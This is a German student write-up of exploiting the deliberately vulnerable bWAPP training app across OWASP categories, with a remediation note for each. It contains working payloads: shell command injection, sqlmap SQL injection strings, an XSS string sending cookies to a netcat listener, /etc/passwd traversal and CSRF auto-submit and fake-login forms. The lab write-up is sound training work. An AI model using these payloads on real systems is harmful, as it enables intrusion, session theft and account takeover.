# BWapp Security Testing - Hilfe! Fette Käfer in meiner Software

![](res/bwapp_title.png)


Viele reden davon, wenige wissen wie damit umzugehen ist: Security - Das Thema beschäftigte bereits Generationen von IT Fachkräften auf aller Welt
Mit der Applikation Bwapp soll auf das Thema Websicherheit sensibilisiert werden.
In 10 Kategorien von A1 bis A10 werden auf die gröbsten Schnitzer in der Webentwicklung eingegangen und erklärt wie diese behoben werden können.


## Intro
- [A1 Injections](#t_1)
    - [HTML Injection GET, POST, Stored](#t_1_1)
    - [Risiko](#t_1_2)
    - [HTML Injection Stored Blog](#t_1_3)
    - [HTML Injection URL](#t_1_4)
    - [iFrame Injection](#t_1_5)
    - [OS Command Injection](#t_1_6)
    - [SQL Injection](#t_1_7)
- [A2 - Broken Auth ](#t_2)
    - [Risiko](#t_2_1)
    - [Broken Login Formular](#t_2_2)
    - [Broken Logout Formular](#t_2_3)
    - [Session Management in URl](#t_2_4)
- [A3 Cross Site Scripting (XSS)](#t_3)
    - [Risiko](#t_3_2)
    - [Reflected (AJAX/JSON)](#t_3_3)
- [A4 Insecure Direct Object Reference](#t_4)
    - [A4 Insecure Order Tickets](#t_4_1)
- [A7 Missing Functional Level Access Controll](#t_44)
    - [Risiko](#t_44_1)
    - [Directory Traversal - Files ](#t_44_2)
- [A8](#t_5)
    - [CSRF](#t_5_1)

Die Website von BwApp beinhaltet diverse Sicherheitslücken.
In dieser Arbeit werden  diese Mängel analysiert sowie ein Vorschlag gemacht wie man damit umgeben kann oder beziehungsweise sie beheben kann.
Die Kalkulationen wurden anhand dieses [Rechners](https://www.first.org/cvss/calculator/3.0) gemacht.

# <a name="t_1">A1 Injections
## <a name="t_1_1">HTML Injection GET, POST, Stored
A1 Risiken haben primär im Bereich der Webprogrammierung anzutreffen. 
Es sind häufig Programmierfehler welchen zu diesen Exploits führen können, 
wie *HTML Injections*, *SQL Injections* sowie *XSS*.

## <a name="t_1_2">Risiko

BWApp Schwierigkeit: hoch

|Kategorie          |Impact     |
|-------------------|-----------|
|**Base Score**     |**9.1**    |

## <a name="t_1_3"> HTML Injection Stored (Blog)
### <a name="t_1_3_1"> Beschreibung
Auf BWApp ist ein Blog in welchem man diverse Guestblogs machen kann.
Hierbei ist es möglich Cross Side Scripting anzuwenden um an diverse User Informationen zu gelangen.
In diesem Schritt wurde die Chalenge auf den Level High probiert zu hacken.

### <a name="t_1_3_2">Fehlerreproduktion Low

Als erstes muss erstens mal herausgefunden werden wie der HTTP Request genau aufgebaut ist:


Hierbei fällt auf, dass der Wert decoded wird.
Das Ergebnis entspricht hier noch nicht dem gewünschten Resultat.

```html
<h1>test</h1>
```
Ergibt hierbei den Wert `%3Ch1%3Etest%3C%2Fh1%3E0`

Bei etwas genauerem Stöbern im HTML fand ich heraus das ein html5.js zusätzlich in die App eingebunden ist.
Hierbei wurde dieses leider minifiziert was uns aber nicht davon abhält einen genaueren Blick auf github.com
zu werfen. (Ist im Script Header beschrieben)

Das html5.js escapet wahrscheinlich beim darstellen die HTML Tags.
Ein erster Ansatz wäre hier nun ein Script zu implementieren, 
welches das js aushebelt, ohne das JavaScript im Browser deaktiviert ist.

Durch das Analysieren des Backends wurde schlussendlich klar, 
dass mit dem Level High eine Standard Funktion von PHP zum Ausparsen nicht erlaubter Ausdrücke verwendet wird.

Mit Low muss nur das oben beschrieben HTML in die Inputbox geschrieben werden. Dieses erscheint anschliessend auf dem Frontend.


### <a name="t_1_3_3">Fehlerreproduktion Middle

Folgende Eingabe wurde in das Input Feld First Name gemacht:

Resultat dabei ist, dass auf der Page das eingegebene HTML angezeigt wird.
Bei GET ist der zusätzlich der Value noch in der URL sichtbar.

### <a name="t_1_3_4">Behebung
Wenn Clientside sowie Serverside auf HTML Tags validiert wird wäre das Problem gelöst
Zusätzlich sollten solche Werte prinzipiell mit POST übermittelt werden.


## <a name="t_1_4">HTML Injection URL
### <a name="t_1_4_1">Kurzinfo
Risikostufe: Kritisch
Wahrscheinlichkeit Schaden: Simpel
Behebung: Simpel

Durchschnitt 7.6

### <a name="t_1_4_2">Beschreibung
Durch das Darstellen der URL kann es möglich sein, fremdes HMTL auf der Website anzuzeigen.

### <a name="t_1_4_3">Fehlerreproduktion
Die URL kann über Burp manipuliert werden. 
Da bei der Sicherheitsstuffe Hoch Client Side Sonderzeichen escaped werden, 
muss der Angriff im Proxy stattfinden.  

### <a name="t_1_4_4">Behebung
Daten welche auf der Website angezeigt werden sollten in der URL encoded werden.

## <a name="t_1_5">iFrame Injection

Der gleiche Angriff kann auch bei einem **iFrame** gemacht werden.
### <a name="t_1_5_1">Reproduktion
#### <a name="t_1_5_2">Low

Wenn man sich die URL genau anschaut sieht man, dass der GET Request aus drei Parameter besteht:

```
http://localhost:85/iframei.php?ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250
```

|Nr|Param|Beschreibung|
|---|-----------|------------------------|
|1  |ParamUrl   |Url oder Pfad zum iFrame|
|2  |ParamWidth |Breite des Fensters     |
|3  |ParamHeight|Höhe des Fensters       |

Nach einigen Tests mit der Höhe und der Breite, fiel der Url Param auf.
Der logische Schluss lässt zu dass ich dort irgendeine Quelle angeben kann.

```
http://localhost:85/iframei.php?
            ParamUrl=<INJECT>
            &ParamWidth=250
            &ParamHeight=250
```

Request
```
http://localhost:85/iframei.php?
            ParamUrl=https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQIK8nxaRwsPRgOq9Y3zMRsEAZzaQx_w3ynH8vWJUBmuOmV3GPO
            &ParamWidth=250
            &ParamHeight=250
```

Als Antwort ist die der vermutete Case eingetroffen.
Die Website zeigt nun das Bild von der URL an.
## <a name="t_1_6">A1 OS Command Injection
### <a name="t_1_6_1">Beschreibung
Command Injections sind Angriffe welche durch nicht abgefangene OS Command Validierung eingesetzt werden können.

### <a name="t_1_6_2">Reproduktion LOW
Als erster Commend wird probiert eine Ausgabe zu machen  

|Input|Output|
|---------------|-------|
|`www.nsa.gov`  |''     |
|`www.nsa.gov;` |''     |
|`;echo test`   |'test' |



Da nun klar ist dass der Command mit ; 
```
$ www.nsa.gov;ifconfig 
eth0 Link encap:Ethernet 
    HWaddr 02:42:ac:11:00:02 
    inet addr:172.17.0.2 
    Bcast:0.0.0.0 
    Mask:255.255.0.0 
    UP BROADCAST RUNNING MULTICAST MTU:1500 
    Metric:1 RX packets:762
     errors:0 
     dropped:0 
     overruns:0 
     frame:0 
     TX packets:672 
     errors:0 
     dropped:0 
     overruns:0
      carrier:0 collisions:0 txqueuelen:0 RX bytes:107630 (107.6 KB) TX bytes:1078536 (1.0 MB) 
     
lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:24 errors:0 dropped:0 overruns:0 frame:0 TX packets:24 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 
txqueuelen:1 RX bytes:1956 (1.9 KB) TX bytes:1956 (1.9 KB)


$ www.nsa.gov;netstat -an;
Active Internet connections (servers and established) 
Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:3306 0.0.0.0:* 
LISTEN tcp 0 0 0.0.0.0:80 0.0.0.0:* 
LISTEN tcp 0 0 172.17.0.2:80 192.168.159.1:54967
ESTABLISHED tcp 0 0 172.17.0.2:80 192.168.159.1:54840 
TIME_WAIT Active UNIX domain sockets (servers and established) 
Proto RefCnt Flags Type State I-Node Path unix 2 [ ACC ] 
STREAM LISTENING 29835 /var/run/supervisor.sock.1 unix 2 [ ACC ] STREAM LISTENING 30323 /var/run/mysqld/mysqld.sock
```
So hat man die wichtigsten Informationen mal zusammen für die Attacke auf das System.

### <a name="t_1_6_3">Reproduktion Middle
Auf Middle funktioniert das Semikolon nicht mehr;
Ich schätze mal dass der Command etwa so im Backend ausgeführt wird:

`nslookup $string`
Dies bedeutet man kann den Command auf diverse Arten erweitern.
z.B 

`nslookup $string ; echo test` -> dies funktioniert wie schon erwähnt nur bei low
`nslookup $string || echo test` -> Mit Pipe scheint es Jedoch zu funktionieren.

### <a name="t_1_6_4">Auflösung

Die Auflösung ist hier ziemlich simpel. 
Der String der Ausgeführt wird muss am besten auf alle Sonderzeichen geprüft werden.
So kann keine Command Line Injection mehr ausgeführt werden.

## <a name="t_1_7">A1 SQL Injection
### <a name="t_1_7_1">Beschreibung
Es gibt die Möglichkeit bei der Abfrage von Daten eine SQL Injection zu machen. 
Dieser Angriff ist möglich wenn SQL Statements im Backend konkatiniert werden.

### <a name="t_1_7_2">Reprodution
Folgender Input wurde hierbei gemacht.


Request 1 wurde mit einem `';` abgesendet:
Als Resultat kam eine SQL Exception zurück.

Die SQL Injection 
`root@kali:~/dev/SecurityReport/res# sqlmap -r http_bwapp_a1_sqlinjection -p movie`

wurde somit festgestellt. Weiter wird mit SqlInject gearbeitet.

``` shell
$ sqlmap -r http_bwapp_a1_sqlinjection -p movie
```
Hierbei scheint auf dem Level Hoch laut sqlmap keim Inject möglich zu sein.

Auf dem Level hoch sieht dies jedoch anders aus.
``` shell
$ sqlmap -r http_bwapp_a1_sqlinjection -p movie
[17:14:43] [WARNING] potential CAPTCHA protection mechanism detected
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: movie (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: movie=1 AND 7541=7541&action=go

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: movie=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71787a6271,(SELECT (ELT(2999=2999,1))),0x716b787171,0x78))s), 8446744073709551610, 8446744073709551610)))&action=go

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: movie=1 AND SLEEP(5)&action=go

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: movie=-6072 UNION ALL SELECT NULL,NULL,CONCAT(0x71787a6271,0x4566624948746863736e4a58596148704d594a56677a526248507a49694155697879437a426b784d,0x716b787171),NULL,NULL,NULL,NULL-- jRGa&action=go
---
[17:14:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[17:14:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/localhost'

[*] shutting down at 17:14:43

```
### <a name="t_1_7_3">Lösung
Das Problem kann wie bei der Sicherheitsstufe high mit einem SQL Framework wie Hybernate gelöst werden.


# <a name="t_2">A2 - Broken Auth 
## <a name="t_2_1">Risiko

BWApp Schwierigkeit: hoch

|Kategorie          |Impact     |
|-------------------|-----------|
|Attack Vector      |Network    |
|Attack Complexity  |Low        |
|Privileges Require |None       |
|User Interaction   |None       |
|Scope              |Unchanged  |
|Confidentialit     |None       |
|Integrity          |High       |
|Availabilty        |High       |
|**Base Score**     |**9.1**    |

## <a name="t_2_2">RisikoBroken Login Formular
Die folgende Aufgabe wurde auf tief und Mittel Gelöst.

### <a name="t_2_2_1">Reproduktion Low
Um den Fehler auf Low zu reproduzieren, muss nur der Quelltext der Website angeschaut werden. 
Hier sind der User und das Passwort direkt im HTML Code implementiert.


``` html
<label for="login">Login:</label><font color="white">tonystark</font>
<input id="login" name="login" size="20" type="text">

<label for="password">Password:</label><font color="white">I am Iron Man</font>
<input id="password" name="password" size="20" type="password"></p>

<button type="submit" name="form" value="submit">Login</button>
```

Wie man hier gut erkenn kann sind die Login Daten im Formular vermerkt.

### <a name="t_2_2_2">Reproduktion medium

``` html
<label for="name">Name:</label><font color="white">brucebanner</font><br>
<input id="name" name="name" size="20" value="brucebanner" type="text">

<label for="passphrase">Passphrase:</label><br>
<input id="passphrase" name="passphrase" size="20" type="password"></p>

<input name="button" value="Unlock" onclick="unlock_secret()" type="button"><br>
```

Man erkennt hier, dass beim  Click auf den Button JS Code ausgeführt wird.
In diesem wird höchstwahrscheinlich der Input validiert.

``` javascript
function unlock_secret() {

    var bWAPP = "bash update killed my shells!"

    var a = bWAPP.charAt(0);  var d = bWAPP.charAt(3);  var r = bWAPP.charAt(16);
    var b = bWAPP.charAt(1);  var e = bWAPP.charAt(4);  var j = bWAPP.charAt(9);
    var c = bWAPP.charAt(2);  var f = bWAPP.charAt(5);  var g = bWAPP.charAt(4);
    var j = bWAPP.charAt(9);  var h = bWAPP.charAt(6);  var l = bWAPP.charAt(11);
    var g = bWAPP.charAt(4);  var i = bWAPP.charAt(7);  var x = bWAPP.charAt(4);
    var l = bWAPP.charAt(11); var p = bWAPP.charAt(23); var m = bWAPP.charAt(4);
    var s = bWAPP.charAt(17); var k = bWAPP.charAt(10); var d = bWAPP.charAt(23);
    var t = bWAPP.charAt(2);  var n = bWAPP.charAt(12); var e = bWAPP.charAt(4);
    var a = bWAPP.charAt(1);  var o = bWAPP.charAt(13); var f = bWAPP.charAt(5);
    var b = bWAPP.charAt(1);  var q = bWAPP.charAt(15); var h = bWAPP.charAt(9);
    var c = bWAPP.charAt(2);  var h = bWAPP.charAt(2);  var i = bWAPP.charAt(7);
    var j = bWAPP.charAt(5);  var i = bWAPP.charAt(7);  var y = bWAPP.charAt(22);
    var g = bWAPP.charAt(1);  var p = bWAPP.charAt(4);  var p = bWAPP.charAt(28);
    var l = bWAPP.charAt(11); var k = bWAPP.charAt(14);
    var q = bWAPP.charAt(12); var n = bWAPP.charAt(12);
    var m = bWAPP.charAt(4);  var o = bWAPP.charAt(19);

    var secret = (d + "" + j + "" + k + "" + q + "" + x + "" + t + "" +o + "" + g + "" + h + "" + d + "" + p);

    if(document.forms[0].passphrase.value == secret){ 
        location.href="/ba_insecure_login_2.php?secret=" + secret;
    }else{
        location.href="/ba_insecure_login_2.php?secret=";
    }
}	

```


Nach verzweifeltem Debuging mit den Firefox Dev Tools fand ich heraus, dass das Passwort in der secret Variable "hulk smash!" ist.

### <a name="t_2_2_3">Lösung des Problems bei low und  medium
Wie bereits schon in mancher Übung von BWapp, ist hier das Problem die Client Side Validierung des HTML Formulars.
Wenn dieses Server Side Validiert werden würde, könnte man den Quellcode für die Validierung nicht debugen und so das Equal für das Passwort nicht herauslesen.


## <a name="t_2_3">A2 Broken Logout Formular
### <a name="t_2_3_1">Beschreibung
Bei einem Logout von der Website sollten alle Session gelöscht werden.
Wenn dies nicht der Fall ist kann dies zu Problemen mit Session Stealing führen.

### <a name="t_2_3_2">Reproduktion Low
Die Reproduktion auf Low ist recht simpel gehalten.
Man öffnet je in 2 Tabs des Browsers die logout Page
Nun loggt man sich auf Page 1 aus.
Auf dem zweiten Tab ist die Session immer noch aktiv

### <a name="t_2_3_3">Reproduktion Medium
### <a name="t_2_3_4">Auflösung
Das Problem kann mit einem schlauen Sessionmanagement gelöst werden, 
indem man dem User aud dem Frontend einen Session Key gibt welcher Zeitlich beschränkt gültig ist, 
und es nicht erlaubt mit derselben Session Id in mehreren Browsern zu arbeiten.
Hierzu gibt es Frameworks wie Oauth2

## <a name="t_2_4">A2 Session Management in URl
### <a name="t_2_4_1">Beschreibung
In diesem Beispiel wird das Verwenden von Session IDs in der URL sowie im Body des HTTP Requests angeschaut.
Die Requests sind in diesen Beispielen nicht mit HTTPS verschlüsselt.

### <a name="t_2_4_2">Reproduktion Low
Auf Low ist die Reproduktion ziemlich einfach 

`http://localhost:8083/smgmt_sessionid_url.php?PHPSESSID=6ndj9s0fh8n7cket04vlp0dku0`

Man startet den Browser im Pornomodus und fügt die obere URL in diesen ein.
Jetzt ist man als user bee im anderen Browser ohne Login eingeloggt.

### <a name="t_2_4_3">Reproduktion middle

```
GET /smgmt_sessionid_url.php HTTP/1.1
Host: localhost:8083
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: security_level=1; PHPSESSID=6ndj9s0fh8n7cket04vlp0dku0
Connection: close
```

Wie man in diesem Request sehen kann, ist es auch möglich den Request zu verfälschen.
Mann muss dazu lediglich das Cookie der anderen Browserinstanz nehmen und kann mit dieser
sich als fremder User einloggen.

### <a name="t_2_4_3">Lösung
Eine Lösung für das Problem kann mit einem Framework wie Oauth2 etc behoben werden. Hierbei muss sich der Entwickler um die Komplexe Handhabung des Sessionmanagements nicht selber künnnerb
# <a name="t_3">A3 Cross Site Scripting (XSS) 
## <a name="t_3_2">Risiko

**Rechnerresultat 8.8**

## <a name="t_3_3">A3 Reflected (AJAX/JSON)
Mit XSS kann der Angreifer ungewollten Code auf dem Browser des Angriffziels ausführen. Hierzu kann gut auf das Wissen von A1 HTML Injection zugegriffen werden.
### <a name="t_3_3_1">Reproduktion Low

Hier wird die Validierung der Response gemacht.

``` javascript
var JSONResponseString = '{"movies":[{"response":"11111??? Sorry, we don&#039;t have that movie :("}]}';
// var JSONResponse = eval ("(" + JSONResponseString + ")");
var JSONResponse = JSON.parse(JSONResponseString);
document.getElementById("result").innerHTML = JSONResponse.[0].response;
```

Auf der ersten Zeile kann man gut erkennen, die Response als JSON in einem String gemapt ist

``` javascript
var JSONResponseString = '{"movies":[{"response":""}]}';console.log('test');'"??? Sorry, we don&#039;t have that movie :("}]}';
```
Mit folgendem String kann auf aus dem JSON Objekt ausgebrochen werden 
```
"}]}';console.log('test');
"}]}';document.getElementById("result").innerHTML='<img src="http://localhost:1234/' + JSON.stringify(document.cookie) +'.img"/>';
```

Mit `nc -lvp 1234` kann nun ein Listener ausfgefahren werden mit welchem auf den Aufruf des Bilds gehorcht wird.

### <a name="t_3_3_3">Lösung
Bei XSS müssen eigentlich nur alle Sonderzeichen aus dem String geparst werden. 
Ohne `{}[]()"*|/()<>` wird XSS ein ziemliches gefrickel, wenn nicht sogar unmöglich.

# <a name="t_4">A4 Insecure Direct Object Reference

|Kategorie          |Impact     |
|-------------------|-----------|
|*Base Score*     |**7.6**    |

## <a name="t_4_1">A4 Insecure Order Tickets
### <a name="t_4_1_1">Beschreibung

Bei der Insecure Direct Object Reference werden Daten bez Objekte Clientside zur validierung überreicht.
Dies kann einfach ausgenutz werden, indem die Daten vor dem Senden an den Client manipuliert werden.

### <a name="t_4_1_2">Reproduktion Low
Ein Blick in das HTML zeigt, dass im Input Feld `ticket_price` der Wert 15 steht.

``` html
I would like to order 
<input name="ticket_quantity" value="1" size="2" type="text"> tickets.
<input name="ticket_price" value="15" type="hidden">
```

Wenn nun dieser Wert zu 0 geändert wird, kostet das Ticket nun nichtsmehr

``` html
<input name="ticket_price" value="0" type="hidden">
```

Der Output bestätigt meine Vermutung.

    You ordered 1 movie tickets.
    Total amount charged from your account automatically: 15 EUR.
    Thank you for your order!

### <a name="t_4_1_3">Reproduktion Middle
Auf Middle scheint der Value nicht mehr dirrekt im HTML gespeichert zu sein.

Bei einem Blick in den Proxy konnte die Variable `ticket_price=0` gesetzt werden.

``` http
POST /insecure_direct_object_ref_2.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/insecure_direct_object_ref_2.php
Cookie: security_level=1; PHPSESSID=ce21uplh4a2rdinms69c2ubpr6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

ticket_quantity=1&action=order&ticket_price=0
```

Das Resultat ist das selbe wie bei Low

### <a name="t_4_1_4">Behebung
Das Problem kann mit der Serverseitigen Validierung von Daten behoben werden.
Es sollte nicht mit klaren Werten sondern mit nicht einfach identifizierbaren Schlüsseln gearbeitet werden.


# <a name="t_44">A7 Missing Functional Level Access Controll
Bei MFLAC ist meist eine fehlerhafte Konfiguration des Webservers das Problem. Hierbei hat die Applikation Rechte auf dem System, 
welche Sie nur bedingt benötigt.
## <a name="t_44_1">Risiko
Risikolevel ist 7.5

## <a name="t_44_2">Directory Traversal - Files 
### <a name="t_44_2_1">Beschreibung LOW
Die URL `http://192.168.159.129/directory_traversal_2.php?page=message.txt` sieht verdächtig aus.
Der Part `?page=message.txt` zeigt mir den Inhalt des angegeben Files an.

Nach einem kleinen Test ist nun der Inhalt von /etc/passwd offen ersichtlich.

```
http://192.168.159.129/directory_traversal_2.php?page=/etc/passwd

root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
libuuid:x:100:101::/var/lib/libuuid: 
syslog:x:101:104::/home/syslog:/bin/false 
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false 
```
Soweit so gut aber man kann bestimmt noch den Code von directory_traversal_2.php anzeigen lassen.

``` php
http://192.168.159.129/directory_traversal_1.php?page=/var/www/html/directory_traversal_1.php

/* 

bWAPP, or a buggy web application, is a free and open source deliberately insecure web application. 
It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. 
bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project! 
It is for security-testing and educational purposes only. 

Enjoy! 

Malik Mesellem 
Twitter: @MME_IT 

bWAPP is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License (http://creativecommons.org/licenses/by-nc-nd/4.0/). Copyright © 2014 MME BVBA. All rights reserved. 

*/ 

include("security.php"); 
include("security_level_check.php"); 
include("functions_external.php"); 
include("admin/settings.php"); 

$bugs = file("bugs.txt"); 

if(isset($_POST["form_bug"]) && isset($_POST["bug"])) 
...
?> 
```
Somit sollte die Aufgabe auf Middle eigentlich auch kein Problem mehr sein

### <a name="t_44_1_2">Beschreibung Middle

Auf middle klappt es nicht wenn ein / drinn ist Dabei kommt eine Meldung dass Directory Traversal versucht wurde.
Da man einen Call über get nicht umbedingt ausschreiben muss kann mans ja mal mit einem URL Decoder probieren.
```
http://192.168.159.129/directory_traversal_1.php?page=%2Fetc%2Fpasswd


root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
...
...
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
libuuid:x:100:101::/var/lib/libuuid: 
syslog:x:101:104::/home/syslog:/bin/false 
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false 
```


### <a name="t_44_1_4">Lösung
Die Problematik kann erstens mit einer sauberen Webserver Konfiguration gelöst werden.
Programatisch sollten Sonderzeichen wie / \ . alle nicht zugelassen werden.
Dies wäre aber bei einer sauberen Berechtigung und Administration nur bedingt nötig.

# <a name="t_5">A8 CSRF 
## <a name="t_5_1">CSRF Change Password
### <a name="t_5_1_1">Beschreibung
Cross Domain Reference oder auch Corse ist, wenn der User eine Seite mit einer unterschiedlichen Base URL aufruft.

### <a name="t_5_1_2">Reproduktion Low

Um auf Low Cors zu reproduzieren muss eine Website mit dem Call erstellt werden.
Hierbei habe ich die Password Change Seite von Chrome abgespeichert und einen Webserver mit dessen Inhalt gestartet
Anschliessend habe ich dass Passwort dass ich setzen will in das HTML eingebettet und anschliessend ein JS implementiert welches direkt den Button für die Passwort Änderung klickt.
``` html
<div id="main">
    
    <h1>CSRF (Change Password)</h1>

    <p>Change your password.</p>

    <form action="http://192.168.159.129/csrf_1.php" method="GET">
        
        <p><label for="password_new">New password:</label><br>
        <input type="password" id="password_new" name="password_new" value="bug"></p>

        <p><label for="password_conf">Re-type new password:</label><br>
        <input type="password" id="password_conf" name="password_conf" value="bug"></p>
        <button id="submitter" type="submit" name="action" value="change">Change</button>
    </form>

    <script>
        document.getElementById("submitter").click();
    </script>
    <br>
</div>
```

Der Call wird dirrekt an den Server weitergeleitet.

### <a name="t_5_1_3">Reproduktion Middle

Hier sieht das ganze schon etwas kniffliger aus.
Ein Problem ist, dasss der User sein altes Passwort selbst noch eingeben muss.
Erste Vermutung ist, dass eventuell das Feld Current Password eine SQL Injection verbirgt
Dies erwies sich jedoch nach einem Checkup mit sqlmap als Erfolgloser Ansatz.

Ein etwas anderer Ansatz wäre hier, dass die Password Change Page so abgeändert wird, dass der User sich einloggen muss.
So hätte man erst mal das Passwort. Beim Login wird mit JS zusätzlich noch das neue Passwort angegeben.


``` html
<div id="main">
    <h1>Login</h1>
    <p>login</p>
    <form action="http://192.168.159.129/csrf_1.php" method="GET">

        <p><label for="password_curr">Current User:</label><br>
        <input type="text" name="userdaten"></p>

        <p><label for="password_curr">Current password:</label><br>
        <input type="password" id="password_curr" name="password_curr"></p>

        <input type="hidden"  id="password_new" value="bug" name="password_new"></p>
        <input type="hidden" id="password_conf" value="bug" name="password_conf"></p>

        <button  type="submit" name="action" value="change">Change</button>
    </form>
    <br>
</div>
```
Zugegeben hier etwas primitiv aber könnte durchaus funktionieren.
Man könnte den Request hier natürlich auch so machen dass der User gar nichts mitbekommt und er anschliessend auf die Mainpage weitergeleitet wird.

### <a name="t_5_1_4">Lösung
Das Problem kann mithilfe eines generierten Hashes welcher im Forumal von Serversite in das HTML generiert wird gelöst werden.
Anhand von diesem String weis das Backend dass das Formular eindeuting verifiziert ist.
Der String muss selbstverständlich eindeutig sein.

## <a name="t_99_1">Schlusswort
Die Applikation bwapp eignet sich sehr gut zur Aneignung der Kompetenz zur erörterung von Sicherheitslücken im Web.
Wenn ich heute eine Webapplikation entwickle oder teste sind mir die Sicherheitslücken viel presenter. 
Schon um auf das Thema sensibilisiert zu werden ist in meinen Augen sehr wichtig.